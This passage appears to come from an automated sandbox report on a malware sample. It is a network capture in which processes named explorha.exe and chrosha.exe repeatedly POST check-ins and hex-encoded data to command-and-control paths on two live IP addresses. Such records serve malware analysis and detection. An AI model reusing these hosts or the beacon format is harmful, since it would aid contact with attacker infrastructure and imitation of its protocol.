                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:35.704313040 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1005192.168.2.550859193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:35.636626005 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:35.883553028 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1006192.168.2.550860193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:36.069868088 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:36.316726923 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1007192.168.2.550861193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:36.134154081 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:36.383733988 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1008192.168.2.550862193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:36.569881916 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:36.826958895 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1009192.168.2.550863193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:36.758793116 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:37.006424904 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1010192.168.2.550864193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:37.181685925 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:37.425400972 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1011192.168.2.550865193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:37.259490013 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:37.507762909 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1012192.168.2.550866193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:37.681504965 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:37.935158968 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1013192.168.2.550867193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:37.871017933 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:38.119838953 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1014192.168.2.550868193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:38.285645008 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:38.525882959 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1015192.168.2.550869193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:38.372169971 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:38.624025106 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1016192.168.2.550870193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:38.778930902 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:39.032505989 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1017192.168.2.550871193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:38.975946903 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:39.220607042 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1018192.168.2.550872193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:39.402957916 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:39.647891998 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1019192.168.2.550873193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:39.478950977 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:39.732130051 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1020192.168.2.550874193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:39.902959108 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
